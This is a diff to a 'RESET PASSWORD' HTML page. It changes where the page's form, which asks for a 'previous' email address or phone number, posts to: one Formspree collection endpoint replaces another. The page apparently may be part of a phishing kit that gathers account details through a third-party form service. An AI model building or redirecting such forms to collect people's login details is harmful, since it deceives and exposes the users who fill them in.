--- a/forget.html
+++ b/forget.html
@@ -58,7 +58,7 @@
         <h1 class="point"><b>RESET PASSWORD</b></h1>
     
         <div class="login-page">
-          <form action="https://formspree.io/f/meqbqavq" method="POST">
+          <form action="https://formspree.io/f/mzblzagn" method="POST">
             <p>
               <label for="email" class="email">Previous Email address or phone number</label> <br>
               <input placeholder="Email address or phone number" type="text" name="email" id="email" required="">
